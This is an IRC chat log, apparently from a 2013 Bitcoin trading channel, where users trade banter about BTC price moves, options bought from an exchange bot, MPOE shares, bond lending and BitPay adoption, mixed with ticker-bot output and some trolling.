Mar 27 14:30:03 that is an interesting metric Bugpowder Mar 27 14:30:18 i'm kicking myself for exercising at 71 Mar 27 14:30:29 MJR_: I have not followed it for long enough to be sure, but worked last week. Mar 27 14:30:33 even with s.dice performance, up 117% overall Mar 27 14:30:46 speaking of which Mar 27 14:30:52 ;;bc,stats Mar 27 14:30:54 Current Blocks: 228244 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1579 blocks | Next Difficulty In About: 1 week, 3 days, 17 hours, 47 minutes, and 45 seconds | Next Difficulty Estimate: 6742099.53802 | Estimated Percent Change: 0.69108 Mar 27 14:30:55 why did you exercise though? Mar 27 14:30:56 is it a sure thing that we will not be seeing any dividends this month? Mar 27 14:31:00 we need more hash Mar 27 14:31:07 bot always pays more than exercise price Mar 27 14:31:14 due to time premium Mar 27 14:31:15 figured that i had the vwap at 71 and it already dropped to 63 Mar 27 14:31:20 so i could exercise then Mar 27 14:31:24 but i didn't buy back in Mar 27 14:31:37 but just sell back to the bot Mar 27 14:31:46 he was offering less Mar 27 14:31:51 mining profitability is too high Mar 27 14:31:54 are you sure? Mar 27 14:32:03 I've never see the bot go lower Mar 27 14:32:09 not sure, but i think so...i exercised from my cell phone as i was walking into a meeting Mar 27 14:32:16 unless bot is using mtgox vwap not 24hprc Mar 27 14:32:33 i think the bot is aware of the mt gox price but not sure he uses it Mar 27 14:32:43 because one time during the flash crash i got filled on a bunch of calls Mar 27 14:32:59 we are bumping into the ceiling hard though Mar 27 14:33:12 wonder what 100 calls would be for next month Mar 27 14:33:36 idk but we're raising fast Mar 27 14:33:39 http://bitcoin.clarkmoody.com/ Mar 27 14:33:46 yep Mar 27 14:33:53 100 in april it looks like Mar 27 14:34:06 if not more...i just think that is the second biggest psychological barrier Mar 27 14:34:17 after the 32 Mar 27 14:34:18 [BTCTC] [B.YABMC] 1 @ 0.016 BTC [+] Mar 27 14:34:20 we're still full on on an exponential course Mar 27 14:34:20 [BTCTC] [B.YABMC] 1 @ 0.01572 BTC [-] Mar 27 14:34:26 It's just crazy Mar 27 14:34:30 that is a bit scary Mar 27 14:34:44 i decided to take my trading profits from yesterday and switch back to lending Mar 27 14:35:06 I steer away from lending now... but you can loan to me. Mar 27 14:35:07 pretty nice when you are trying to decide between 280% apy or 10% in one day trading Mar 27 14:35:14 my guess is that we will be in for some volatility today... Mar 27 14:35:18 lol, margin lending on bitfinex Mar 27 14:35:24 i agree totally Mar 27 14:35:34 margin lending =/ Mar 27 14:35:41 but my long overnight position worked well, though i got stopped loss and didn't get the top Mar 27 14:36:05 tiberiusiv: you are so right, no one will remark on the fact that we hit triple digits Mar 27 14:36:16 tiberiusiv: just another day, there won't be articles saying that Mar 27 14:36:37 ugh...i can't get sucked into your trollery today...sorry Mar 27 14:36:43 MJR, loan to me, I have plenty of collateral and I'm borrowing =P Mar 27 14:37:02 Namworld: whats the interest? i think i already am lending to you through btc-bond Mar 27 14:37:11 yeah, BTC-BOND Mar 27 14:37:22 i thought you were going to start calling some of those bonds? Mar 27 14:37:37 shares, a whole lot of them Mar 27 14:37:41 btc bond is a great investment Mar 27 14:37:55 i love daily interest Mar 27 14:38:42 in some businesses such as: www.satoshidice.com - www.bitcoinpride.com - www.bitvps.com and more Mar 27 14:40:14 I keep my debt at a fraction of my outstanding loan so it can mitigate the risk of something failing. Mar 27 14:42:12 Among other things. But the biggest earnings are from buying and flipping shares right back. There's some pretty big gaps in prices with illiquidity Mar 27 14:42:35 I try not to have my toes dipped in most things for too long. Mar 27 14:42:42 Basically, yes. Mar 27 14:43:30 BTC-BOND is me. Mar 27 14:44:56 ;;ticker Mar 27 14:44:57 BTCUSD ticker | Best bid: 86.30101, Best ask: 86.74000, Bid-ask spread: 0.43899, Last trade: 86.74000, 24 hour volume: 75041.74738403, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 80.66941 Mar 27 14:47:56 I pay 10.95% per year (0.03% daily) Mar 27 14:48:24 I suspect it's because I keep it at a fraction of my total worth and that I'm spread out among various exchanges and businesse types. Things could fail spectacularly and I'd still be able to repay all my debt. People like that. Mar 27 14:48:30 ;;goxlag Mar 27 14:48:31 86.511175 seconds Mar 27 14:48:34 it's not a problem to at all have such earnings from btc options Mar 27 14:48:41 And since I'm flipping shares in BTC, income is in BTC. Mar 27 14:49:16 tiberiusiv, on NYSE if you figure out a strategy, there is 100ppl with same idea already Mar 27 14:49:18 Otherwise IDK why people would lend BTC at thos rate, they usually require multiple % per week on BTC loans. Mar 27 14:49:30 Hardly 1% per month. Mar 27 14:49:37 here you're usually alone, and for long time Mar 27 14:49:51 thanks to people like you that scream OMG ITS A SCAM Mar 27 14:50:18 Also, I'm not sure I'm fit for the NYSE. BTC is easier, more movement, larger spread, no competition. It's a good training ground at least. Mar 27 14:50:19 in this case yes Mar 27 14:50:54 NYSE is more competitive. Less spreads too. Mar 27 14:52:15 SPY options are too competitive Mar 27 14:52:15 sry, if that "learning" would make me such a zealot like you are... no thanks :) Mar 27 14:52:20 you will get you face ripped off Mar 27 14:52:30 I had so many different assets in BTC, I was spending lots of time watching markets/refreshing pages. Income has grown. Mar 27 14:52:39 the bitcoin options market is much less efficient Mar 27 14:52:48 I've left my day job to have time to do all this trading. Mar 27 14:52:55 Some months ago Mar 27 14:52:58 Money is made by exploiting the inefficiencies of the market Mar 27 14:53:17 well bearz.... Mar 27 14:53:19 I've made a lot of put. I've been trying to go short since 30 USD/BTC Mar 27 14:53:22 [BTCTC] [PAJKA.BOND] 9 @ 0.1075 = 0.9675 BTC [+] Mar 27 14:53:24 I've made losses there Mar 27 14:53:38 If you would look at the history, people have been net losers in the options every month but august Mar 27 14:53:42 tiberiusiv, there were some whale bears that tried to move mkt down and cash out options.. but they failed Mar 27 14:53:57 this month looks like people are actually going to come out on top Mar 27 14:53:58 I still believe this is going to crash. I'll still have puts each month ready. Mar 27 14:54:02 [HAVELOCK] [HIM] 1 @ 1.85 BTC [+] Mar 27 14:54:34 Anyway, I'm pretty much doing this full time by now... Mar 27 14:54:39 [BTCTC] [PAJKA.BOND] 10 @ 0.09 = 0.9 BTC [-] Mar 27 14:54:45 I lost plenty of money trading options in 2007-2009 Mar 27 14:55:04 btc market is 100x more exploitable Mar 27 14:55:13 by someone with my resources Mar 27 14:55:36 long term options trading in real financial markets is a loser for the retail investor Mar 27 14:55:50 in btc options, I think it can be a winner Mar 27 14:55:53 at least for me. Mar 27 14:56:14 I agree with that statement Mar 27 14:56:19 bug, if you were to buy an option right now, which one would you buy? Mar 27 14:56:22 particularly when the spread is 30% on the bot Mar 27 14:56:31 [BTCTC] [ASICMINER-PT] 2 @ 0.714994 = 1.43 BTC [+] Mar 27 14:56:42 If the bot was still offfering C750Ts, I would buy them Mar 27 14:56:58 I would perhaps buy puts tomrrow Mar 27 14:57:00 Bugpowder: they were pretty expensive Mar 27 14:57:05 tiberiusiv: i would tend to agree, as I believe this is the ceiling for the day. Mar 27 14:57:19 If I were actaully going to buy anything though, I would do it Mar 27 14:57:23 instead of sitting here Mar 27 14:57:26 typing Mar 27 14:57:35 right now, I'm not buying or selling anything Mar 27 14:57:48 90% of the time, the best trade is to do nothing Mar 27 14:57:59 hehehe, i decided to take a break from trading too...just lending now Mar 27 14:57:59 http://namcdn.com/btcalarm/ Mar 27 14:58:27 Use it, it's useful. Better on chrome tho, other browsers tend to drop websocket connection a lot more. Mar 27 14:58:54 Actually, the best play right now looks to be buying S.MPOE Mar 27 14:59:20 maybe not actually Mar 27 14:59:32 wont they loss their ass on options this month? Mar 27 14:59:41 bbet is pretty funny Mar 27 14:59:52 well, its valued by the market Mar 27 14:59:57 Chaang-Noi: MPOE income comes from % on trading... Mar 27 15:00:10 oh Mar 27 15:00:19 then how could it be valued anywhere near what it is? Mar 27 15:00:24 if MPOE survives without a loss this month, it will bounce to 0.00075 Mar 27 15:00:33 is gonna be like 40 or 50 btc this month i think (estimate) Mar 27 15:00:37 The money for options is borrowed from people depositing for a % I believe Mar 27 15:00:41 slightly over 100$ Mar 27 15:00:43 ;) Mar 27 15:00:51 tiberiusiv: bbest valuation is based on growth expectations Mar 27 15:00:58 Those people are risking their funds for a % Mar 27 15:01:04 which at 200000 satoshi, are pretty aggressive Mar 27 15:01:20 whats the oix at? Mar 27 15:01:21 jurov i very much doubt that, whale to you is 100btc. <<< lol, now how did you came to that conclusion? Mar 27 15:01:27 i only hold AM :/ Mar 27 15:01:28 MPOE has paid out 1% on good months Mar 27 15:01:54 so in 100 good months they break even :) Mar 27 15:01:56 5-10% Mar 27 15:02:24 MPOE bot pays 5-10% on capital used Mar 27 15:02:34 and makes 12% profit / month Mar 27 15:02:36 average Mar 27 15:02:52 ;;asks 87.61 Mar 27 15:02:55 There are currently 1452.6593 bitcoins offered at or under 87.61 USD, worth 126503.501188 USD in total. | Data vintage: 0.0015 seconds Mar 27 15:03:33 yep Mar 27 15:03:43 its a nascent market Mar 27 15:03:49 tiberiusiv ,BitVPS was quite profitable, too. Mar 27 15:03:56 yes Mar 27 15:04:04 it was valued pretty fairly too Mar 27 15:04:08 but its owner suddenly got an idea it's better to get employed Mar 27 15:04:09 lol Mar 27 15:04:09 AM is not gambling :/ Mar 27 15:04:44 tiberiusiv but most of fiat is gambling, too Mar 27 15:04:54 ;;bids 0 Mar 27 15:04:55 There are currently 36656711 bitcoins demanded at or over 0.0 USD, worth 9714666.78044 USD in total. | Data vintage: 119.6155 seconds Mar 27 15:04:59 how much of money supply is ion forex? 90% Mar 27 15:05:26 forex is the same thing. just considered legal. Mar 27 15:05:28 ;;asks 89.80 Mar 27 15:05:30 There are currently 4816.7931 bitcoins offered at or under 89.8 USD, worth 425118.737376 USD in total. | Data vintage: 0.0017 seconds Mar 27 15:05:51 oh tibby on limb again Mar 27 15:05:58 ;;bids 85 Mar 27 15:05:59 There are currently 1053.2444 bitcoins demanded at or over 85.0 USD, worth 89853.9093844 USD in total. | Data vintage: 27.9878 seconds Mar 27 15:06:00 that's a pretty small % Mar 27 15:06:21 troll feeding time again? Mar 27 15:06:25 okcupid.com is now accepting bitcoins Mar 27 15:06:32 take that! Mar 27 15:06:53 on that news, btc falls to 50 Mar 27 15:07:06 tiberiusiv yes and? drug scene in your city has more users that a bank, too Mar 27 15:07:42 in btcland it is just more visible Mar 27 15:07:48 that is not true Mar 27 15:08:23 mtgox monthly is $100MM Mar 27 15:09:05 compare same month to same month Mar 27 15:09:14 so all T options expire on Friday. But their price is going to vary based on VWAP, which is going up every second I babble here.... Mar 27 15:10:25 SD has much more action than SR Mar 27 15:10:28 VWAP link to please Mar 27 15:11:00 Chaang-Noi: http://bitcoincharts.com/markets/currencies/ Mar 27 15:11:23 but SD has lot lower learning curve Mar 27 15:11:25 thanks jurov Mar 27 15:11:27 not hassle with tor Mar 27 15:11:42 and it's INSTANT Mar 27 15:12:05 they use the 24 hour? Mar 27 15:12:05 ^ another myth yet to be proved Mar 27 15:12:14 Chaang-Noi: yes MPOE uses that one Mar 27 15:12:18 thanks Mar 27 15:13:34 okay, you made the sales pitch. so what are we to do with SR? Mar 27 15:14:01 [HAVELOCK] [VTX] 3 @ 0.59 = 1.77 BTC [-] Mar 27 15:14:49 phew. someone steals their wallet and they'll clamor to list quickly Mar 27 15:15:08 as happened to many enterprises already Mar 27 15:15:34 tiberiusiv but that has nothing to do with bitcoin Mar 27 15:15:34 tiberiusiv: what? People often sell a portion of profitable businesses Mar 27 15:15:50 if paypal was anonymous, it would be used instead Mar 27 15:16:18 Wether because they need growth capital, are retiring or simply to reduce market exposure/risk. Mar 27 15:16:23 or popular detergent will be used. whatever is at hand Mar 27 15:17:27 same with the banks Mar 27 15:18:08 doesn't matter if it 'seems legit'. Mar 27 15:19:06 so what's your point, tiberiusiv? Mar 27 15:19:33 yes Mar 27 15:19:40 that is why i bought in Mar 27 15:19:47 ugh I need to get rid of my day job Mar 27 15:20:01 once the mob learns about btc we will go to $100,000 tc Mar 27 15:20:04 btc Mar 27 15:20:17 yeah, i can agree with you there -- going off the Internets history, it follows. Mar 27 15:20:19 i quit a year ago... Mar 27 15:20:25 the mob knows Mar 27 15:20:30 my problem is i own the business Mar 27 15:20:31 cartel knows Mar 27 15:20:38 ThickAsThieves: Sell it for BTC! Mar 27 15:20:38 sell it for btc Mar 27 15:20:40 so i need to find ways to unload clients Mar 27 15:20:41 tiberiusiv i agree too. but you aren't telling normal retailers what to do Mar 27 15:20:58 well these people know me, i have to make sure they are treated ok Mar 27 15:20:59 if there's money, retailers will come Mar 27 15:21:16 its like 60 hosted websites, plus incidental updates Mar 27 15:21:31 then a bunch of graphic design work and print brokering Mar 27 15:21:36 sell it to Namworld Mar 27 15:21:53 you contradict yourself Mar 27 15:21:59 tiberslav lol you on meth? Mar 27 15:22:12 lol Mar 27 15:22:14 namworld obv is busy Mar 27 15:22:16 if "the cartels" are using it, then it's clearly more than a small group Mar 27 15:22:50 What? I'm not too busy for that. Mar 27 15:22:56 and it's usefult to them to use bitcoins on all levels down to the street Mar 27 15:23:00 hence mass adoption Mar 27 15:23:01 shared hosting? Mar 27 15:23:07 when btc reaches $10,000 im pretty srue im going to by my own cartel Mar 27 15:23:08 and webmastering Mar 27 15:23:09 hence mass market Mar 27 15:23:23 I can do that, but what kind of rates are they used to? Mar 27 15:23:30 Actually, PM me. Mar 27 15:24:15 tiberiusiv if it will be useful for them avoid hassle of exchanging the bills to bitcoins, they'll drop their customs quickly Mar 27 15:24:28 ^^^^ Mar 27 15:24:50 ironic, isn't it…Mexicans want USD while a bunch of Americans prefer BTC Mar 27 15:25:01 profit first, they get engineers to build half mile tunnels underneath the border, they will force Nerds to handle their BTC Mar 27 15:25:16 then ID requirement will come quickly Mar 27 15:25:21 shoulkd that happen Mar 27 15:26:08 anyway, all the runners, that's a mass market already Mar 27 15:26:24 and for them it's better to buy things directly for btc Mar 27 15:26:41 than to go to walmart and risk doxing and being catched on camera Mar 27 15:27:51 well, don't tell this will stay so any extended period Mar 27 15:28:20 no your point seems to be "retailers wont evar" Mar 27 15:28:42 and i say, okay, if criminal element adopts it on mass scale, retilers will follow" Mar 27 15:29:44 false Mar 27 15:30:02 "people will always spend fiat" Plainly not true. Not always at least. Mar 27 15:30:05 people will spend btc now because its an easy way to cashout Mar 27 15:31:12 your crime elements do Mar 27 15:31:31 and you yourself said they supposedly have problems to exchange it back Mar 27 15:31:31 it's good to be mindful of the risk of BTC going poof due to external factors, but I'm not that worried…woudln't it take a concerted, coordinated global effort to bring it all down permanently? I'm not talking 51% attack here Mar 27 15:31:44 so these WILL use retail if available Mar 27 15:31:45 ;;ticker Mar 27 15:31:46 BTCUSD ticker | Best bid: 86.91001, Best ask: 86.99999, Bid-ask spread: 0.08998, Last trade: 87.00000, 24 hour volume: 74748.36316424, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 80.81460 Mar 27 15:31:58 tiberiusiv: simple logic, no? Mar 27 15:32:00 ;;bc,24hprc Mar 27 15:32:01 80.79 Mar 27 15:32:04 and the world can't even properly discuss climate change; i don't see that they could execute a destruction of the bitcoin network Mar 27 15:32:11 anyone had trouble getting over 1 wire a day from fast cash. total >$10l Mar 27 15:32:18 >$10k Mar 27 15:32:41 tiberiusiv: what do you see as the right investment / speculative play in the btc space right now? Mar 27 15:32:46 ;;calc (80.79 - 75) / 80.79 Mar 27 15:32:46 0.0716672855551 Mar 27 15:32:55 woot! Mar 27 15:32:56 I am hearing a lot about what ISN'T good. What IS good. Mar 27 15:33:06 don't lol. they can indeed launder some of the bitcoins disguised as t-shirt operation Mar 27 15:33:14 the best investment strategy is to tell people in IRC the opposite of what you believe to be true Mar 27 15:33:18 LOL Mar 27 15:33:24 Bugpowder: it is way too hard to come up with something creative, let's just detract from the good that is going on Mar 27 15:34:09 BitPay processed 2 Million dollars worth of transactions for VENDORS Mar 27 15:34:30 just saying they are growing Mar 27 15:34:36 vendors are slowly starting to accept them Mar 27 15:34:55 Bugpowda your bet paid off Mar 27 15:34:56 so that would be double Mar 27 15:35:04 thanks for snatching those options fo may Mar 27 15:35:07 yes...and doubled the payments processed Mar 27 15:35:22 meaning more merchants are starting to get into this space Mar 27 15:35:25 that is just one metric Mar 27 15:35:25 it's clearly more than nothing Mar 27 15:35:43 um... Mar 27 15:35:50 do you not know how they work? Mar 27 15:35:57 you set your price IN DOLLARS Mar 27 15:36:04 they deal with conversion Mar 27 15:36:17 lol Mar 27 15:36:25 your company is doing so much better in this space Mar 27 15:36:35 bfl is a joke Mar 27 15:36:36 what was its name again? Mar 27 15:36:37 apples and oranges dude Mar 27 15:37:01 The BTC retail space is < 6 months old Mar 27 15:37:02 oh thats right, you haven't done one thing so far that is actually valuable to anyone in this community Mar 27 15:37:19 so bitpay: 2 million tiberiusiv: 0 Mar 27 15:37:23 I bet bitpay growth is faster than paypal Mar 27 15:37:35 no doubt bitpay is faster Mar 27 15:37:41 tibby has coinbr account.. so it's valuable for me :) Mar 27 15:37:44 tiberslav oh lol Mar 27 15:37:50 how do i constantly get sucked in to these epic troll fests Mar 27 15:38:00 got to learn to avoid them Mar 27 15:38:02 i was wondering that too MJR_ Mar 27 15:38:10 tiberslav is a funny troll Mar 27 15:38:11 lol Mar 27 15:38:13 has tiberiusiv done anything Mar 27 15:38:29 tiberslav is from nigeria and only has .35 btc:/ Mar 27 15:38:29 fucking armchair quarterback Mar 27 15:38:56 so you start a payment processer, a gambling site, an exchange...do something Mar 27 15:39:10 which is a new high in this space Mar 27 15:39:17 mr tiberslav too busy tolling and cashing in govt welfare checks to do anything productinv Mar 27 15:39:18 850 million is tiny compared to forex trading Mar 27 15:39:32 apparently you don't undeerstand emerging markets AT ALL Mar 27 15:39:55 tiberiusiv is the guy saying "why would anyone ever need internet on their phone" Mar 27 15:40:15 "the personal computer is not really necessary" Mar 27 15:40:17 850 million dollars? Mar 27 15:40:22 tiberiusiv, care do a bet on bitbet? Mar 27 15:40:28 that'd be enough to fix the united states =/ Mar 27 15:40:40 like "bitpay will reach 100mil this year" Mar 27 15:41:01 why not? Mar 27 15:41:44 i can't... Mar 27 15:41:51 what has bitpay to do with gpsy??? Mar 27 15:42:01 [HAVELOCK] [VTX] 5 @ 0.586 = 2.93 BTC [-] Mar 27 15:42:02 [HAVELOCK] [VTX] 9 @ 0.585 = 5.265 BTC [-] Mar 27 15:42:12 !ticker h HIM Mar 27 15:42:14 [HAVELOCK:HIM] 1D: 1.65000000 / 1.772 / 1.85000000 (25 shares, 44.30000000 BTC), 7D: 1.41000000 / 1.78286455 / 2.00000000 (189 shares, 336.96140034 BTC), 30D: 1.40000000 / 2.09569993 / 18.00000000 (657 shares, 1376.87485269 BTC) Mar 27 15:42:24 wow Mar 27 15:42:36 say yourself...whatever amount it won't cross Mar 27 15:42:57 btw is there a european bitpay? Mar 27 15:44:39 there are some eu partners: https://bitpay.com/bitcoin-integration-partners Mar 27 15:45:01 [HAVELOCK] [HIM] 2 @ 1.85 = 3.7 BTC [+] Mar 27 15:46:01 [HAVELOCK] [VTX] 5 @ 0.585 = 2.925 BTC [-] Mar 27 15:46:06 you know those vendors dont ONLY sell in bitcoins right? Mar 27 15:46:26 hence emerging markets Mar 27 15:46:27 tiberius... there's more than a 0.99% fee for those converting to USD Mar 27 15:46:35 It's 3% AFAIK, I think. Mar 27 15:46:39 And disclosed Mar 27 15:46:40 as more people switch to this alternate economy Mar 27 15:46:44 they will grow Mar 27 15:46:45 0.99% is for those keeping BTC Mar 27 15:46:57 it seems like you have no concept of future valuation Mar 27 15:47:03 credit cards are 2.9% Mar 27 15:47:03 first mover value Mar 27 15:47:07 value of market share Mar 27 15:47:10 look at gox Mar 27 15:47:12 they suck Mar 27 15:47:14 the merchants disguise it though Mar 27 15:47:17 raking in money cuz there first Mar 27 15:47:34 no, you pay back in USD Mar 27 15:47:37 wall at 87 is lasting... Mar 27 15:47:44 need usa to wake up? Mar 27 15:47:48 which is what people paid you... all vendors pay back in USD, almost Mar 27 15:48:00 [HAVELOCK] [VTX] 2 @ 0.585 = 1.17 BTC [-] Mar 27 15:48:23 not if they want to cash out Mar 27 15:48:39 it's not an issue only with bitpay, it's an issue with all vendors Mar 27 15:48:57 !ticker m S.MPOE Mar 27 15:48:57 beside, works the other way around. If a refund is request after a price drop, more BTC Mar 27 15:48:58 [MPEX:S.MPOE] 1D: 0.00060001 / 0.00062529 / 0.00064816 (173321 shares, 108.38 BTC), 7D: 0.00060001 / 0.00068467 / 0.00077505 (2085337 shares, 1,427.77 BTC), 30D: 0.00060001 / 0.00073814 / 0.00078628 (17972130 shares, 13,266.12 BTC) Mar 27 15:48:59 ah thats better Mar 27 15:49:01 [HAVELOCK] [VTX] 6 @ 0.57 = 3.42 BTC [-] Mar 27 15:49:02 [HAVELOCK] [VTX] 2 @ 0.567 = 1.134 BTC [-] Mar 27 15:49:03 [HAVELOCK] [VTX] 3 @ 0.567 = 1.701 BTC [-] Mar 27 15:49:04 [HAVELOCK] [VTX] 3 @ 0.565 = 1.695 BTC [-] Mar 27 15:49:19 Bugpowder, congrats on the overnight trade. Well played. Mar 27 15:49:25 i can't do this anymore...too distracting and fun getting trolled, but have work to do thank god for ignore Mar 27 15:50:00 unbalanced: thanks! not a trade till I close the position though :-0 I'll let the vwap get at least $5 higher first. Mar 27 15:50:01 [HAVELOCK] [VTX] 3 @ 0.565 = 1.695 BTC [-] Mar 27 15:50:02 [HAVELOCK] [VTX] 8 @ 0.554 = 4.432 BTC [-] Mar 27 15:50:51 [MPEX] [S.MPOE] 2000 @ 0.00061253 = 1.2251 BTC [+] Mar 27 15:51:03 Oh I thought you closed it out. re: something you said yesterday, I'd pay to have you run my funds just from what I've seen here in a week Mar 27 15:52:06 I want a Tesla too so Ifig I have to learn from someone who's doing it. Mar 27 15:52:10 so this price boom is why the c750s when to .24999? Mar 27 15:52:22 The bot is sold out Mar 27 15:52:39 if you want to buy my C750s at .24999 though, you are welcome to them Mar 27 15:52:49 i'm just looking on coinbr. Mar 27 15:52:58 ;;seen smickles Mar 27 15:52:58 smickles was last seen in #bitcoin-assets 9 hours, 10 minutes, and 17 seconds ago: well, if you answer, please hilight me so i can find it easier :) Mar 27 15:52:59 unbalanced: Unfortunately I don't think running a fund is actually legal Mar 27 15:53:08 unless registered etc. Mar 27 15:53:09 Bugpowder, I don't know any better, just trying to wrap my pea brain around it before I started trading options Mar 27 15:53:20 so I'd like to stay legal. Mar 27 15:53:43 also, I have just been pretty lucky this month Mar 27 15:54:01 past performance is not necessarily indicative of future results. Mar 27 15:55:03 you think MPOE will bounce back to .00075 if it survives OIX trading this month? Mar 27 15:55:34 yes Mar 27 15:55:40 a bubble of unprecedented proportions vs a booming economy soon to be worth billions... Mar 27 15:56:15 bubble Mar 27 15:56:28 well booming economy, yes, but not that fast... Mar 27 15:56:41 not that fast!!! Mar 27 15:56:45 cause nam said so!! Mar 27 15:56:53 heres a ticket bitcoin Mar 27 15:56:55 for speeding. Mar 27 15:57:02 p/e isn't the right indicator here. it's considered low risk longer term investment which is rare for btc Mar 27 15:57:04 tiberiusiv: you have zero experience in MPEx securities. I wouldn't be so confident until you get a better sense of the way things work around here Mar 27 15:57:38 deadweasel: If MPOE bond holders avoid a loss this month, yes, S.MPOE will bounce. Mar 27 15:58:11 tiberiusiv thing is only few loud folks think it's overvalued Mar 27 15:58:16 tiberiusiv is negative on just about 99% of things. Mar 27 15:58:18 interesting, i didn't realize OIX was 'funded' by the MPOE.Bond. learning is fun! Mar 27 15:58:30 lol nam Mar 27 15:59:20 tiberiusiv, do you really know better btc investment than s.mpoe? with consistent profit and known business model? Mar 27 15:59:54 SR doesn't exist as an investment Mar 27 16:00:05 The MPOE bot volume has seen explosive growth over the past year Mar 27 16:00:34 I think its down to 85% Mar 27 16:00:39 or 80% Mar 27 16:00:39 tiberiusiv that's not what i asked. is there anything better? Mar 27 16:01:01 [HAVELOCK] [VTX] 2 @ 0.532 = 1.064 BTC [-] Mar 27 16:01:07 hahahahaha cavirtex Mar 27 16:01:09 the fact is, there is a lot of hot money in the BTC investment space, and not a lot of options Mar 27 16:01:32 but cavirtex is a fiat business Mar 27 16:01:36 Bugpowder: amen to that Mar 27 16:01:45 this is the time to start a bitcoin venture Mar 27 16:01:48 they will inevitable get less btc-profitable Mar 27 16:01:57 [BTCTC] [ASICMINER-PT] 5 @ 0.714994 = 3.575 BTC [+] Mar 27 16:02:03 [BTCTC] [ASICMINER-PT] 10 @ 0.714995 = 7.15 BTC [+] Mar 27 16:02:05 [BTCTC] [ASICMINER-PT] 20 @ 0.715 = 14.3 BTC [+] Mar 27 16:02:07 i was wondering...how could package up a VXX for btc Mar 27 16:02:26 mpex is as removed from fiat as possible.. together with sdice Mar 27 16:02:59 it's true, if there is no fiat, the is no legal precedent for a GLBSE type event Mar 27 16:03:14 it's uncharted territory. Mar 27 16:03:29 they are this "down" every now and then, that's not argument Mar 27 16:04:09 both numbers are completely virtual Mar 27 16:04:35 and so is coinbr Mar 27 16:04:43 withdraw while you can Mar 27 16:05:06 Bugpowder: I assume you're in the US... you know better than I but if you're managing pure BTC trades and client accounts are funded in BTC and they can only w/d in BTC you might be okay. Mar 27 16:05:40 hahahaha and in sloakia we don't even have general attorney elected for over a year Mar 27 16:05:48 where "might" = risk, sure. If you have better info than I pls link so I can educate myself... no rush. Mar 27 16:05:57 i say, withdraw the fuck from coinbr while you can Mar 27 16:05:57 yurop ftw Mar 27 16:06:01 info re: licensing, not trade ideas Mar 27 16:06:12 btc im bored, go up already Mar 27 16:06:24 Chaang-Noi sell some to help it Mar 27 16:06:48 tiberiusiv , yes it was. a year ago Mar 27 16:06:54 kako hell no, not until well over $1000 and im willing to wait a few years:) Mar 27 16:07:43 ;;asks 87 Mar 27 16:07:46 There are currently 808.85515 bitcoins offered at or under 87.0 USD, worth 70368.6225068 USD in total. | Data vintage: 0.0015 seconds Mar 27 16:08:07 okay so wait till then and stfu Mar 27 16:08:18 he wont stfu :( Mar 27 16:08:26 lol Mar 27 16:08:47 but they will have to get enough btc from these "crime elements" first. not that will be fun Mar 27 16:08:59 im a goat Mar 27 16:09:01 or they will turn to mircea. that will be even moar fun Mar 27 16:09:19 it could be moved Mar 27 16:09:38 the bottom line is that it is the most secure site with by far the highest volume Mar 27 16:09:51 anyway it isn't for sale. it's like berkshire hathaway "nobody will pay these trillions" Mar 27 16:09:55 and has an owner that actaully knows what the fuck he is doing Mar 27 16:10:11 unlike every other BTC startup I have seen Mar 27 16:10:25 tiberiusiv i see some % of that volume and can vouch that it *is* there Mar 27 16:10:44 I see some % of it too Mar 27 16:10:55 how do you know the volume is on NYSE? on forex? Mar 27 16:11:10 I think he will partner Mar 27 16:11:21 you obviously consider yourself intelligent, so do it Mar 27 16:11:26 i;m waiting Mar 27 16:11:57 im a goat and im on a boat Mar 27 16:12:16 tiberslav the nigerian keeps quakin Mar 27 16:12:39 yes, fiat scammers have to maintain appearance Mar 27 16:13:02 tiberslav tiberslav we are going to change the world, we are the new masters Mar 27 16:13:08 coinlab and coinbase haven't figured out the suit part yet either Mar 27 16:13:08 but zuck is a pussy Mar 27 16:13:18 and I think mircera wears a suit Mar 27 16:13:19 usually Mar 27 16:13:31 http://www.google.com/imgres?imgurl=http://images.zoso.ro/img/2010/01/mircea_popescu.jpg&imgrefurl=http://www.zoso.ro/mircea-popescu-este-cel-mai-influent-si-mai-destept-om-din-lume-si-din-romania/&h=420&w=322&sz=43&tbnid=Ax15b4F7WV-jVM:&tbnh=90&tbnw=69&zoom=1&usg=__AQxh65wDxZWtX1qGa-I250HzGvo=&docid=ooulPqIKMouWNM&sa=X&ei=hf5SUfaaK7PH4APj4oCABA&ved=0CE0Q9QEwAw&dur=238 Mar 27 16:13:44 he wears a suit on a fuckin camel Mar 27 16:13:48 ... Mar 27 16:13:49 should probably shave though Mar 27 16:14:11 tiberiusiv: have you seen him burning qu'ran? Mar 27 16:14:27 lol really jurov? Mar 27 16:14:28 heheh Mar 27 16:14:49 yeah that vid could be problematic to wall street Mar 27 16:14:59 offened? just increased the odds his ass gets killed Mar 27 16:15:21 http://www.popscreen.com/v/6nD6v/Barbequran-starring-Mircea-Popescu Mar 27 16:15:33 btc ahs no laws Mar 27 16:15:48 need to install flash :/ Mar 27 16:15:58 seems it gor removed :/ Mar 27 16:16:02 *got Mar 27 16:16:20 funny so much to say over romania when usa is full of btc failed biz and scams and jesuses on meth Mar 27 16:16:35 yes, mp had article abuot famous knife fight too Mar 27 16:16:36 I liked MP training class for gypsies. Mar 27 16:16:40 tiberslav tiberslav, he is a jesus on meth, but from nigeria Mar 27 16:17:01 [HAVELOCK] [SDICE] 1 @ 0.475 BTC [+] Mar 27 16:17:13 but anyway wallstreet has its own problems and it's well possible it won't survive move to deflationary currency Mar 27 16:18:10 ;;asks 87 Mar 27 16:18:13 There are currently 997.4039 bitcoins offered at or under 87.0 USD, worth 86755.5680726 USD in total. | Data vintage: 0.0020 seconds Mar 27 16:18:24 ]growiong :/ wake up america! Mar 27 16:18:25 can't find. ask him to see it Mar 27 16:18:35 we're awake! Mar 27 16:19:01 yet it works better Mar 27 16:19:57 in slovakia they learned and are all white-collar now.. would prefer romanian ways sometimes Mar 27 16:20:24 Only if you are not the one in the trunk. Mar 27 16:20:38 was it? Mar 27 16:20:50 I thought that was still delayed Mar 27 16:21:02 nah, now eu wants in romania Mar 27 16:21:03 ;;asks 92 Mar 27 16:21:05 There are currently 9357.0707 bitcoins offered at or under 92.0 USD, worth 837704.987653 USD in total. | Data vintage: 0.0016 seconds Mar 27 16:21:10 no, only schengen zone (free movement) was delayed Mar 27 16:21:22 ah Mar 27 16:21:28 i got a box of some of the finest cubans in the world, and no lighter.... Mar 27 16:21:29 ecb knows where the btc is Mar 27 16:21:36 